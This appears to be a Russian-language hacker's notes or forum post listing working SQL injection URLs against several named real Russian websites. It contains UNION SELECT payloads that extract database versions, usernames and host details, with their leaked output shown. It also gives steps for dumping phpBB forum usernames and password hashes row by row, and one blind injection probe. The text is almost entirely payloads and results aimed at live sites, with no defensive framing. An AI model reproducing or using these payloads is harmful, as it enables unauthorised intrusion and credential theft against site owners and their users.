http://ihtc.ru/device.php?id=-39+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37,concat_ws(0x3a,version(),user(), database())
4.1.22:digs_mysql@194.85.95.84:digs_ihtc

на сайте есть форум, phpbb, попробуем обратиться к phpbb_users

http://ihtc.ru/device.php?id=-39+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37,38+from+phpbb_users
"38" выводится, пробуем вырвать юзеров и пароли

http://ihtc.ru/device.php?id=-39+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37,concat_ws(0x3a,user_id,username, user_password)+from+phpbb_users+limit+1,1

меняем limit...


и т.д.

------------------

http://www.blesna-n.ru/fotoalbum.php?rez=-2+union+select+11111,22222,concat_ws(0x3a,version( ),user(),database())
отображается в ссылке (<A HREF=../pic/big_regats/4.1.22:blesnan@tix.hc.ru:wwwblesnanru target="1" или просто посмотреть в статусе при наведении на месте где должна была быть фотка )

----------------

http://www.clever.saratov.ru/site/photo/index.php?id_parent=2+and+substring(version(),1,1) =5

-----------------

http://www.3eye.ru/screen-info.php?screen=-7+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4,5,6,7,8,9
4.0.17:3eye@localhost:3eye